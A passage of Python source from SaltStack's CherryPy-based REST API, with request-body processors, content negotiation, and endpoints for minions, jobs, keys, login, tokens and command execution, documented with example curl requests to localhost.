            resp_head["Access-Control-Max-Age"] = "1400"

        # Note: CherryPy on Py3 uses binary objects for the response
        # Python 2.6 also supports the byte prefix, so no need for conditionals
        cherrypy.response.body = b""
        cherrypy.response.status = 200
        # CORS requests should short-circuit the other tools.
        cherrypy.serving.request.handler = None

        # Needed to avoid the auth_tool check.
        if cherrypy.request.config.get("tools.sessions.on", False):
            cherrypy.session["token"] = True
        return True
# Be conservative in what you send
# Maps Content-Type to serialization functions; this is a tuple of tuples to
# preserve order of preference.
ct_out_map = (
    ("application/json", salt.utils.json.dumps),
    (
        "application/x-yaml",
        # default_flow_style=False forces block-style (indented) YAML output.
        functools.partial(salt.utils.yaml.safe_dump, default_flow_style=False),
    ),
)
def hypermedia_handler(*args, **kwargs):
    """
    Determine the best output format based on the Accept header, execute the
    regular handler, and transform the output to the request content type (even
    if it's an error).

    :param args: Pass args through to the main handler
    :param kwargs: Pass kwargs through to the main handler
    """
    # Execute the real handler. Handle or pass-through any errors we know how
    # to handle (auth & HTTP errors). Reformat any errors we don't know how to
    # handle as a data structure.
    try:
        cherrypy.response.processors = dict(ct_out_map)
        ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
    except (
        salt.exceptions.AuthenticationError,
        salt.exceptions.AuthorizationError,
        salt.exceptions.EauthAuthenticationError,
        salt.exceptions.TokenAuthenticationError,
    ):
        raise cherrypy.HTTPError(401)
    except salt.exceptions.SaltInvocationError:
        raise cherrypy.HTTPError(400)
    except (
        salt.exceptions.SaltDaemonNotRunning,
        salt.exceptions.SaltReqTimeoutError,
    ) as exc:
        raise cherrypy.HTTPError(503, exc.strerror)
    except salt.exceptions.SaltClientTimeout:
        raise cherrypy.HTTPError(504)
    except cherrypy.CherryPyException:
        raise
    except Exception as exc:  # pylint: disable=broad-except
        # The TimeoutError exception class was removed in CherryPy in 12.0.0, but
        # Still check existence of TimeoutError and handle in CherryPy < 12.
        # The check was moved down from the SaltClientTimeout error line because
        # A one-line if statement throws a BaseException inheritance TypeError.
        if hasattr(cherrypy, "TimeoutError") and isinstance(exc, cherrypy.TimeoutError):
            raise cherrypy.HTTPError(504)

        import traceback

        logger.debug(
            "Error while processing request for: %s",
            cherrypy.request.path_info,
            exc_info=True,
        )

        cherrypy.response.status = 500

        # Only expose the traceback when running in debug mode.  (The
        # redundant "{}".format() wrapper around format_exc() was removed;
        # format_exc() already returns a str.)
        ret = {
            "status": cherrypy.response.status,
            "return": traceback.format_exc()
            if cherrypy.config["debug"]
            else "An unexpected error occurred",
        }

    # Raises 406 if requested content-type is not supported
    best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])

    # Transform the output from the handler into the requested output format
    cherrypy.response.headers["Content-Type"] = best
    out = cherrypy.response.processors[best]
    try:
        response = out(ret)
        return salt.utils.stringutils.to_bytes(response)
    except Exception:  # pylint: disable=broad-except
        msg = "Could not serialize the return data from Salt."
        logger.debug(msg, exc_info=True)
        raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
    """
    Determine the best handler for the requested content type

    Wrap the normal handler and transform the output from that handler into the
    requested content type
    """
    req = cherrypy.serving.request
    # Stash the real handler so hypermedia_handler can invoke it later.
    req._hypermedia_inner_handler = req.handler

    # If handler has been explicitly set to None, don't override.
    if req.handler is not None:
        req.handler = hypermedia_handler
def process_request_body(fn):
    """
    A decorator to skip a processor function if process_request_body is False
    """

    @functools.wraps(fn)
    def wrapped(*args, **kwargs):  # pylint: disable=C0111
        should_process = cherrypy.request.process_request_body
        if should_process is not False:
            fn(*args, **kwargs)

    return wrapped
def urlencoded_processor(entity):
    """
    Accept x-www-form-urlencoded data and reformat it into a Low State
    data structure.

    Since we can't easily represent complicated data structures with
    key-value pairs, any more complicated requirements (e.g. compound
    commands) must instead be delivered via JSON or YAML.

    For example::

    .. code-block:: bash

        curl -si localhost:8000 -d client=local -d tgt='*' \\
                -d fun='test.kwarg' -d arg='one=1' -d arg='two=2'

    :param entity: raw POST data
    """
    # cherrypy._cpreqbody.process_urlencoded doesn't preserve the raw
    # "body", so we have to handle parsing the tokens using parse_qsl
    urlencoded = entity.read()
    try:
        urlencoded = urlencoded.decode("utf-8")
    except (UnicodeDecodeError, AttributeError):
        pass
    cherrypy.serving.request.raw_body = urlencoded
    unserialized_data = {}
    for key, val in parse_qsl(urlencoded):
        unserialized_data.setdefault(key, []).append(val)
    # Keys that appeared once collapse to their bare value; repeated keys
    # stay lists. Every key above received at least one append, so the old
    # ``len(val) == 0`` branch was unreachable dead code and was removed.
    for key, val in unserialized_data.items():
        if len(val) == 1:
            unserialized_data[key] = val[0]
    cherrypy.serving.request.unserialized_data = unserialized_data
@process_request_body
def json_processor(entity):
    """
    Unserialize raw POST data in JSON format to a Python data structure.

    :param entity: raw POST data
    """
    # https://github.com/cherrypy/cherrypy/pull/1572
    buf = io.BytesIO()
    entity.fp.read(fp_out=buf)
    buf.seek(0)
    body = salt.utils.stringutils.to_unicode(buf.read())
    del buf
    try:
        unserialized = salt.utils.json.loads(body)
    except ValueError:
        raise cherrypy.HTTPError(400, "Invalid JSON document")
    cherrypy.serving.request.unserialized_data = unserialized
    cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
    """
    Unserialize raw POST data in YAML format to a Python data structure.

    :param entity: raw POST data
    """
    # https://github.com/cherrypy/cherrypy/pull/1572
    buf = io.BytesIO()
    entity.fp.read(fp_out=buf)
    buf.seek(0)
    body = salt.utils.stringutils.to_unicode(buf.read())
    try:
        # NOTE(review): only ValueError is mapped to a 400 here, mirroring
        # the original code; a YAML parse error that is not a ValueError
        # would surface as a 500 — confirm whether that is intended.
        unserialized = salt.utils.yaml.safe_load(body)
    except ValueError:
        raise cherrypy.HTTPError(400, "Invalid YAML document")
    cherrypy.serving.request.unserialized_data = unserialized
    cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
    """
    Attempt to unserialize plain text as JSON

    Some large services still send JSON with a text/plain Content-Type. Those
    services are bad and should feel bad.

    :param entity: raw POST data
    """
    # https://github.com/cherrypy/cherrypy/pull/1572
    buf = io.BytesIO()
    entity.fp.read(fp_out=buf)
    buf.seek(0)
    body = salt.utils.stringutils.to_unicode(buf.read())
    try:
        unserialized = salt.utils.json.loads(body)
    except ValueError:
        # Not JSON after all -- pass the raw text through untouched.
        unserialized = body
    cherrypy.serving.request.unserialized_data = unserialized
    cherrypy.serving.request.raw_body = body
def hypermedia_in():
    """
    Unserialize POST/PUT data of a specified Content-Type.

    The following custom processors all are intended to format Low State data
    and will place that data structure into the request object.

    :raises HTTPError: if the request contains a Content-Type that we do not
        have a processor for
    """
    # Be liberal in what you accept
    content_processors = {
        "application/x-www-form-urlencoded": urlencoded_processor,
        "application/json": json_processor,
        "application/x-yaml": yaml_processor,
        "text/yaml": yaml_processor,
        "text/plain": text_processor,
    }

    request = cherrypy.request

    # Do not process the body for POST requests that have specified no content
    # or have not specified Content-Length
    is_post = request.method.upper() == "POST"
    declared_length = request.headers.get("Content-Length", "0")
    if is_post and declared_length == "0":
        request.process_request_body = False
        request.unserialized_data = None

    request.body.processors.clear()
    # Anything not in the map above falls through to a 406 response.
    request.body.default_proc = cherrypy.HTTPError(406, "Content type not supported")
    request.body.processors = content_processors
def lowdata_fmt():
    """
    Validate and format lowdata from incoming unserialized request data

    This tool requires that the hypermedia_in tool has already been run.
    """
    if cherrypy.request.method.upper() != "POST":
        return

    data = cherrypy.request.unserialized_data

    # if the data was sent as urlencoded, we need to make it a list.
    # this is a very forgiving implementation as different clients set different
    # headers for form encoded data (including charset or something similar)
    if not (data and isinstance(data, Mapping)):
        # Already a list (or empty) -- pass through unchanged.
        cherrypy.serving.request.lowstate = data
        return

    # Make the 'arg' param a list if not already
    arg = data.get("arg")  # pylint: disable=unsupported-membership-test
    if "arg" in data and not isinstance(arg, list):
        data["arg"] = [arg]

    # Finally, make a Low State and put it in request
    cherrypy.request.lowstate = [data]
# Map each CherryPy hook point to the tools that should run there, in order.
tools_config = {
    "on_start_resource": [
        ("html_override", html_override_tool),
        ("salt_token", salt_token_tool),
    ],
    "before_request_body": [
        ("cors_tool", cors_tool),
        ("salt_auth", salt_auth_tool),
        ("hypermedia_in", hypermedia_in),
    ],
    "before_handler": [
        ("lowdata_fmt", lowdata_fmt),
        ("hypermedia_out", hypermedia_out),
        ("salt_ip_verify", salt_ip_verify_tool),
    ],
}

# Register every tool with CherryPy. Priorities start at 50 and increase
# with list position so tools fire in the order declared above.
for hook_point, registrations in tools_config.items():
    for offset, (tool_name, tool_fn) in enumerate(registrations):
        tool = cherrypy.Tool(hook_point, tool_fn, priority=50 + offset)
        setattr(cherrypy.tools, tool_name, tool)
###############################################################################
class LowDataAdapter:
    """
    The primary entry point to Salt's REST API
    """

    exposed = True

    _cp_config = {
        "tools.salt_token.on": True,
        "tools.sessions.on": True,
        "tools.sessions.timeout": 60 * 10,  # 10 hours
        # 'tools.autovary.on': True,
        "tools.hypermedia_out.on": True,
        "tools.hypermedia_in.on": True,
        "tools.lowdata_fmt.on": True,
        "tools.salt_ip_verify.on": True,
    }

    def __init__(self):
        self.opts = cherrypy.config["saltopts"]
        self.apiopts = cherrypy.config["apiopts"]
        self.api = salt.netapi.NetapiClient(self.opts)

    def exec_lowstate(self, client=None, token=None):
        """
        Pull a Low State data structure from request and execute the low-data
        chunks through Salt. The low-data chunks will be updated to include the
        authorization token for the current session.

        :param client: optional client name forced onto every chunk
            (e.g. ``local_async``).
        :param token: optional Salt eauth token added to every chunk.
        :raises cherrypy.HTTPError: 400 when the lowstate is not a list;
            401 when a chunk carries a non-hex token.
        """
        lowstate = cherrypy.request.lowstate

        # Release the session lock before executing any potentially
        # long-running Salt commands. This allows different threads to execute
        # Salt commands concurrently without blocking.
        if cherrypy.request.config.get("tools.sessions.on", False):
            cherrypy.session.release_lock()

        # if the lowstate loaded isn't a list, lets notify the client
        if not isinstance(lowstate, list):
            raise cherrypy.HTTPError(400, "Lowstates must be a list")

        # Make any requested additions or modifications to each lowstate, then
        # execute each one and yield the result.
        for chunk in lowstate:
            if token:
                chunk["token"] = token

            # Make sure that auth token is hex. (This check previously
            # appeared twice verbatim; one pass is sufficient.)
            if "token" in chunk:
                try:
                    int(chunk["token"], 16)
                except (TypeError, ValueError):
                    raise cherrypy.HTTPError(401, "Invalid token")

            if client:
                chunk["client"] = client

            # Make any 'arg' params a list if not already.
            # This is largely to fix a deficiency in the urlencoded format.
            if "arg" in chunk and not isinstance(chunk["arg"], list):
                chunk["arg"] = [chunk["arg"]]

            ret = self.api.run(chunk)

            # Sometimes Salt gives us a return and sometimes an iterator
            if isinstance(ret, Iterator):
                yield from ret
            else:
                yield ret

    @cherrypy.config(**{"tools.sessions.on": False})
    def GET(self):
        """
        An explanation of the API with links of where to go next

        .. http:get:: /

            :reqheader Accept: |req_accept|

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000

        .. code-block:: text

            GET / HTTP/1.1
            Host: localhost:8000
            Accept: application/json

        **Example response:**

        .. code-block:: text

            HTTP/1.1 200 OK
            Content-Type: application/json
        """
        return {
            "return": "Welcome",
            "clients": salt.netapi.CLIENTS,
        }

    @cherrypy.tools.salt_token()
    @cherrypy.tools.salt_auth()
    def POST(self, **kwargs):
        """
        Send one or more Salt commands in the request body

        .. http:post:: /

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|
            :reqheader Content-Type: |req_ct|

            :resheader Content-Type: |res_ct|

            :status 200: |200|
            :status 400: |400|
            :status 401: |401|
            :status 406: |406|

            :term:`lowstate` data describing Salt commands must be sent in the
            request body.

        **Example request:**

        .. code-block:: bash

            curl -sSik https://localhost:8000 \\
                -b ~/cookies.txt \\
                -H "Accept: application/x-yaml" \\
                -H "Content-type: application/json" \\
                -d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'

        .. code-block:: text

            POST / HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml
            X-Auth-Token: d40d1e1e
            Content-Type: application/json

            [{"client": "local", "tgt": "*", "fun": "test.ping"}]

        **Example response:**

        .. code-block:: text

            HTTP/1.1 200 OK
            Content-Length: 200
            Allow: GET, HEAD, POST
            Content-Type: application/x-yaml

            return:
            - ms-0: true
                ms-1: true
                ms-2: true
                ms-3: true
                ms-4: true
        """
        return {"return": list(self.exec_lowstate(token=cherrypy.session.get("token")))}
class Minions(LowDataAdapter):
    """
    Convenience URLs for working with minions
    """

    _cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})

    def GET(self, mid=None):  # pylint: disable=arguments-differ
        """
        A convenience URL for getting lists of minions or getting minion
        details

        .. http:get:: /minions/(mid)

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/minions/ms-3

        .. code-block:: text

            GET /minions/ms-3 HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml

        **Example response:**

        .. code-block:: text

            HTTP/1.1 200 OK
            Content-Length: 129005
            Content-Type: application/x-yaml

            return:
            - ms-3:
                grains.items:
                    ...
        """
        # No mid means "all minions".
        chunk = {"client": "local", "tgt": mid or "*", "fun": "grains.items"}
        cherrypy.request.lowstate = [chunk]

        session_token = cherrypy.session.get("token")
        return {
            "return": list(self.exec_lowstate(token=session_token)),
        }

    def POST(self, **kwargs):
        """
        Start an execution command and immediately return the job id

        .. http:post:: /minions

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|
            :reqheader Content-Type: |req_ct|

            :resheader Content-Type: |res_ct|

            :status 200: |200|
            :status 400: |400|
            :status 401: |401|
            :status 406: |406|

            Lowstate data describing Salt commands must be sent in the request
            body. The ``client`` option will be set to
            :py:meth:`~salt.client.LocalClient.local_async`.

        **Example request:**

        .. code-block:: bash

            curl -sSi localhost:8000/minions \\
                -b ~/cookies.txt \\
                -H "Accept: application/x-yaml" \\
                -d '[{"tgt": "*", "fun": "status.diskusage"}]'

        .. code-block:: text

            POST /minions HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml
            Content-Type: application/json

            tgt=*&fun=status.diskusage

        **Example response:**

        .. code-block:: text

            HTTP/1.1 202 Accepted
            Content-Length: 86
            Content-Type: application/x-yaml

            return:
            - jid: '20130603122505459265'
                minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
            _links:
                jobs:
                - href: /jobs/20130603122505459265
        """
        session_token = cherrypy.session.get("token")
        job_data = list(self.exec_lowstate(client="local_async", token=session_token))

        # Build hypermedia links for each job that actually started.
        job_links = []
        for job in job_data:
            if job:
                job_links.append({"href": "/jobs/{}".format(job["jid"])})

        cherrypy.response.status = 202
        return {
            "return": job_data,
            "_links": {"jobs": job_links},
        }
class Jobs(LowDataAdapter):
    _cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})

    def GET(self, jid=None, timeout=""):  # pylint: disable=arguments-differ
        """
        A convenience URL for getting lists of previously run jobs or getting
        the return from a single job

        .. http:get:: /jobs/(jid)

            List jobs or show a single job from the job cache.

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/jobs

        .. code-block:: text

            GET /jobs HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml

        **Example response:**

        .. code-block:: text

            HTTP/1.1 200 OK
            Content-Length: 165
            Content-Type: application/x-yaml

            return:
            - '20121130104633606931':
                Arguments:
                - '3'
                Function: test.fib
                Start Time: 2012, Nov 30 10:46:33.606931
                Target: jerry
                Target-type: glob

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/jobs/20121130104633606931

        .. code-block:: text

            GET /jobs/20121130104633606931 HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml

        **Example response:**

        .. code-block:: text

            HTTP/1.1 200 OK
            Content-Length: 73
            Content-Type: application/x-yaml

            info:
            - Arguments:
                - '3'
                Function: test.fib
                Minions:
                - jerry
                Start Time: 2012, Nov 30 10:46:33.606931
                Target: '*'
                Target-type: glob
                User: saltdev
                jid: '20121130104633606931'
            return:
            - jerry:
                - - 0
                - 1
                - 1
                - 2
                - 6.9141387939453125e-06
        """
        # A jid looks up one job; otherwise list everything in the job cache.
        lowstate = {"client": "runner"}
        if jid:
            lowstate.update({"fun": "jobs.list_job", "jid": jid})
        else:
            lowstate.update({"fun": "jobs.list_jobs"})

        cherrypy.request.lowstate = [lowstate]
        job_ret_info = list(self.exec_lowstate(token=cherrypy.session.get("token")))

        ret = {}
        if jid:
            ret["info"] = [job_ret_info[0]]
            # Both branches of the old if/else assigned the identical value,
            # so the conditional has been collapsed into one expression. Also
            # guard against a missing/None "Result" key, which previously
            # raised a TypeError when iterated.
            returns = job_ret_info[0].get("Result") or {}
            minion_ret = {
                minion: data.get("return") for minion, data in returns.items()
            }
            ret["return"] = [minion_ret]
        else:
            ret["return"] = [job_ret_info[0]]
        return ret
class Keys(LowDataAdapter):
    """
    Convenience URLs for working with minion keys

    .. versionadded:: 2014.7.0

    These URLs wrap the functionality provided by the :py:mod:`key wheel
    module <salt.wheel.key>` functions.
    """

    def GET(self, mid=None):  # pylint: disable=arguments-differ
        """
        Show the list of minion keys or detail on a specific key

        .. versionadded:: 2014.7.0

        .. http:get:: /keys/(mid)

            List all keys or show a specific key

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/keys

        .. code-block:: text

            GET /keys HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml

        **Example response:**

        .. code-block:: text

            HTTP/1.1 200 OK
            Content-Length: 165
            Content-Type: application/x-yaml

            return:
            local:
            - master.pem
            - master.pub
            minions:
            - jerry
            minions_pre: []
            minions_rejected: []

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/keys/jerry

        .. code-block:: text

            GET /keys/jerry HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml

        **Example response:**

        .. code-block:: text

            HTTP/1.1 200 OK
            Content-Length: 73
            Content-Type: application/x-yaml

            return:
            minions:
                jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
        """
        # Fingerprint one key, or list all keys when no mid is given.
        if mid:
            lowstate = [{"client": "wheel", "fun": "key.finger", "match": mid}]
        else:
            lowstate = [{"client": "wheel", "fun": "key.list_all"}]

        cherrypy.request.lowstate = lowstate
        result = self.exec_lowstate(token=cherrypy.session.get("token"))

        return {"return": next(result, {}).get("data", {}).get("return", {})}

    @cherrypy.config(**{"tools.hypermedia_out.on": False, "tools.sessions.on": False})
    def POST(self, **kwargs):
        r"""
        Easily generate keys for a minion and auto-accept the new key

        Accepts all the same parameters as the :py:func:`key.gen_accept
        <salt.wheel.key.gen_accept>`.

        .. note:: A note about ``curl``
            Avoid using the ``-i`` flag or HTTP headers will be written and
            produce an invalid tar file.

        Example partial kickstart script to bootstrap a new minion:

        .. code-block:: text

            %post
            mkdir -p /etc/salt/pki/minion
            curl -sSk https://localhost:8000/keys \
                    -d mid=jerry \
                    -d username=kickstart \
                    -d password=kickstart \
                    -d eauth=pam \
                | tar -C /etc/salt/pki/minion -xf -

            mkdir -p /etc/salt/minion.d
            printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
            %end

        .. http:post:: /keys

            Generate a public and private key and return both as a tarball

            Authentication credentials must be passed in the request.

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -sSk https://localhost:8000/keys \
                    -d mid=jerry \
                    -d username=kickstart \
                    -d password=kickstart \
                    -d eauth=pam \
                    -o jerry-salt-keys.tar

        .. code-block:: text

            POST /keys HTTP/1.1
            Host: localhost:8000

        **Example response:**

        .. code-block:: text

            HTTP/1.1 200 OK
            Content-Length: 10240
            Content-Disposition: attachment; filename="saltkeys-jerry.tar"
            Content-Type: application/x-tar

            jerry.pub0000644000000000000000000000070300000000000010730 0ustar  00000000000000
        """
        lowstate = cherrypy.request.lowstate
        lowstate[0].update({"client": "wheel", "fun": "key.gen_accept"})

        # key.gen_accept expects the minion id as "id_".
        if "mid" in lowstate[0]:
            lowstate[0]["id_"] = lowstate[0].pop("mid")

        result = self.exec_lowstate()
        ret = next(result, {}).get("data", {}).get("return", {})

        # Encode first, then size the tar members from the *byte* length.
        # The previous code set TarInfo.size from the character count before
        # encoding, which would corrupt the archive whenever the encoded
        # length differed (non-ASCII content).
        pub_key = ret.get("pub", "").encode(__salt_system_encoding__)
        priv_key = ret.get("priv", "").encode(__salt_system_encoding__)

        pub_key_file = tarfile.TarInfo("minion.pub")
        pub_key_file.size = len(pub_key)
        priv_key_file = tarfile.TarInfo("minion.pem")
        priv_key_file.size = len(priv_key)

        fileobj = io.BytesIO()
        # Context manager guarantees the archive is finalized (closed) even
        # if addfile raises part-way through.
        with tarfile.open(fileobj=fileobj, mode="w") as tarball:
            tarball.addfile(pub_key_file, io.BytesIO(pub_key))
            tarball.addfile(priv_key_file, io.BytesIO(priv_key))

        headers = cherrypy.response.headers
        headers[
            "Content-Disposition"
        ] = 'attachment; filename="saltkeys-{}.tar"'.format(lowstate[0]["id_"])
        headers["Content-Type"] = "application/x-tar"
        headers["Content-Length"] = len(fileobj.getvalue())
        headers["Cache-Control"] = "no-cache"

        fileobj.seek(0)
        return fileobj
class Login(LowDataAdapter):
    """
    Log in to receive a session token
    :ref:`Authentication information <rest_cherrypy-auth>`.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Eauth resolver used to mint tokens in POST below.
        self.auth = salt.auth.Resolver(self.opts)

    def GET(self):
        """
        Present the login interface
        .. http:get:: /login
            An explanation of how to log in.
            :status 200: |200|
            :status 401: |401|
            :status 406: |406|
        **Example request:**
        .. code-block:: bash
            curl -i localhost:8000/login
        .. code-block:: text
            GET /login HTTP/1.1
            Host: localhost:8000
            Accept: text/html
        **Example response:**
        .. code-block:: text
            HTTP/1.1 200 OK
            Content-Type: text/html
        """
        cherrypy.response.headers["WWW-Authenticate"] = "Session"
        return {
            "status": cherrypy.response.status,
            "return": "Please log in",
        }

    def POST(self, **kwargs):
        """
        :ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
        .. http:post:: /login
            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|
            :reqheader Content-Type: |req_ct|
            :form eauth: the eauth backend configured for the user
            :form username: username
            :form password: password
            :status 200: |200|
            :status 401: |401|
            :status 406: |406|
        **Example request:**
        .. code-block:: bash
            curl -si localhost:8000/login \\
                -c ~/cookies.txt \\
                -H "Accept: application/json" \\
                -H "Content-type: application/json" \\
                -d '{
                    "username": "saltuser",
                    "password": "saltuser",
                    "eauth": "auto"
                }'
        .. code-block:: text
            POST / HTTP/1.1
            Host: localhost:8000
            Content-Length: 42
            Content-Type: application/json
            Accept: application/json
            {"username": "saltuser", "password": "saltuser", "eauth": "auto"}
        **Example response:**
        .. code-block:: text
            HTTP/1.1 200 OK
            Content-Type: application/json
            Content-Length: 206
            X-Auth-Token: 6d1b722e
            Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
            {"return": {
                "token": "6d1b722e",
                "start": 1363805943.776223,
                "expire": 1363849143.776224,
                "user": "saltuser",
                "eauth": "pam",
                "perms": [
                    "grains.*",
                    "status.*",
                    "sys.*",
                    "test.*"
                ]
            }}
        """
        # Fail fast when the master is down rather than hanging on auth.
        if not self.api._is_master_running():
            raise salt.exceptions.SaltDaemonNotRunning("Salt Master is not available.")
        # the urlencoded_processor will wrap this in a list
        if isinstance(cherrypy.serving.request.lowstate, list):
            creds = cherrypy.serving.request.lowstate[0]
        else:
            creds = cherrypy.serving.request.lowstate
        username = creds.get("username", None)
        # Validate against the whitelist.
        if not salt_api_acl_tool(username, cherrypy.request):
            raise cherrypy.HTTPError(401)
        # Mint token.
        token = self.auth.mk_token(creds)
        if "token" not in token:
            raise cherrypy.HTTPError(
                401, "Could not authenticate using provided credentials"
            )
        # The session id doubles as the API-side auth token; the Salt eauth
        # token is kept server-side in the session.
        cherrypy.response.headers["X-Auth-Token"] = cherrypy.session.id
        cherrypy.session["token"] = token["token"]
        # expire/start are epoch seconds; /60 converts the token lifetime to
        # minutes for CherryPy's session timeout.
        cherrypy.session["timeout"] = (token["expire"] - token["start"]) / 60
        # Grab eauth config for the current backend for the current user
        try:
            eauth = self.opts.get("external_auth", {}).get(token["eauth"], {})
            if token["eauth"] == "django" and "^model" in eauth:
                perms = token["auth_list"]
            else:
                # Get sum of '*' perms, user-specific perms, and group-specific perms
                perms = eauth.get(token["name"], []).copy()
                perms.extend(eauth.get("*", []))
                if "groups" in token and token["groups"]:
                    user_groups = set(token["groups"])
                    # Group entries in eauth config are suffixed with '%'.
                    eauth_groups = {
                        i.rstrip("%") for i in eauth.keys() if i.endswith("%")
                    }
                    for group in user_groups & eauth_groups:
                        perms.extend(eauth["{}%".format(group)])
                if not perms:
                    logger.debug("Eauth permission list not found.")
        except Exception:  # pylint: disable=broad-except
            # Malformed external_auth config must not break login; report
            # empty perms instead.
            logger.debug(
                "Configuration for external_auth malformed for eauth %r, and user %r.",
                token.get("eauth"),
                token.get("name"),
                exc_info=True,
            )
            perms = None
        return {
            "return": [
                {
                    "token": cherrypy.session.id,
                    "expire": token["expire"],
                    "start": token["start"],
                    "user": token["name"],
                    "eauth": token["eauth"],
                    # perms may be None (malformed config); fall back to {}.
                    "perms": perms or {},
                }
            ]
        }
class Logout(LowDataAdapter):
    """
    Class to remove or invalidate sessions
    """

    _cp_config = dict(
        LowDataAdapter._cp_config,
        **{"tools.salt_auth.on": True, "tools.lowdata_fmt.on": False}
    )

    def POST(self):  # pylint: disable=arguments-differ
        """
        Destroy the currently active session and expire the session cookie
        """
        # Expire the cookie client-side, then swap in a fresh server-side
        # session so the old id can no longer be replayed.
        cherrypy.lib.sessions.expire()
        cherrypy.session.regenerate()
        return {"return": "Your token has been cleared"}
class Token(LowDataAdapter):
    """
    Generate a Salt token from eauth credentials

    Wraps functionality in the :py:mod:`auth Runner <salt.runners.auth>`.

    .. versionadded:: 2017.7.0
    """

    @cherrypy.config(**{"tools.sessions.on": False})
    def POST(self, **kwargs):
        r"""
        .. http:post:: /token

            Generate a Salt eauth token

            :status 200: |200|
            :status 400: |400|
            :status 401: |401|

        **Example request:**

        .. code-block:: bash

            curl -sSk https://localhost:8000/token \
                -H 'Content-type: application/json' \
                -d '{
                    "username": "saltdev",
                    "password": "saltdev",
                    "eauth": "auto"
                }'

        **Example response:**

        .. code-block:: text

            HTTP/1.1 200 OK
            Content-Type: application/json

            [{
                "start": 1494987445.528182,
                "token": "e72ca1655d05...",
                "expire": 1495030645.528183,
                "name": "saltdev",
                "eauth": "auto"
            }]
        """
        for creds in cherrypy.request.lowstate:
            # Translate each credential chunk into an auth.mk_token runner
            # call; all three credential fields are mandatory.
            try:
                kwarg = {
                    "username": creds["username"],
                    "password": creds["password"],
                    "eauth": creds["eauth"],
                }
            except KeyError:
                raise cherrypy.HTTPError(
                    400, 'Require "username", "password", and "eauth" params'
                )
            creds.update(client="runner", fun="auth.mk_token", kwarg=kwarg)
        return list(self.exec_lowstate())
class Run(LowDataAdapter):
    """
    Run commands bypassing the :ref:`normal session handling
    <rest_cherrypy-auth>`.

    salt-api does not enforce authorization, Salt's eauth system does that.
    Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
    **or** ``token`` kwargs that are then checked by the eauth system. The
    session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
    eauth token and then passes the ``token`` kwarg in automatically.

    If you already have a Salt eauth token, perhaps generated by the
    :py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
    Runner module, then there is no reason to use sessions.

    This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
    **or** a ``token`` kwarg and does not make use of sessions at all.
    """

    _cp_config = dict(LowDataAdapter._cp_config, **{"tools.sessions.on": False})

    def POST(self, **kwargs):
        """
        Run commands bypassing the :ref:`normal session handling
        <rest_cherrypy-auth>`. Otherwise, this URL is identical to the
        :py:meth:`root URL (/) <LowDataAdapter.POST>`.

        .. http:post:: /run

            An array of lowstate data describing Salt commands must be sent in
            the request body.

            :status 200: |200|
            :status 400: |400|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -sS localhost:8000/run \\
                -H 'Accept: application/x-yaml' \\
                -H 'Content-type: application/json' \\
                -d '[{
                    "client": "local",
                    "tgt": "*",
                    "fun": "test.ping",
                    "username": "saltdev",
                    "password": "saltdev",
                    "eauth": "auto"
                }]'

        **Or** using a Salt Eauth token:

        .. code-block:: bash

            curl -sS localhost:8000/run \\
                -H 'Accept: application/x-yaml' \\
                -H 'Content-type: application/json' \\
                -d '[{
                    "client": "local",
                    "tgt": "*",
                    "fun": "test.ping",
                    "token": "<salt eauth token here>"
                }]'

        .. code-block:: text

            POST /run HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml
            Content-Length: 75
            Content-Type: application/json

            [{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]

        **Example response:**

        .. code-block:: text

            HTTP/1.1 200 OK
            Content-Length: 73
            Content-Type: application/x-yaml

            return:
            - ms-0: true
                ms-1: true
                ms-2: true
                ms-3: true
                ms-4: true

        The /run endpoint can also be used to issue commands using the salt-ssh
        subsystem. When using salt-ssh, eauth credentials must also be
        supplied, and are subject to :ref:`eauth access-control lists <acl>`.

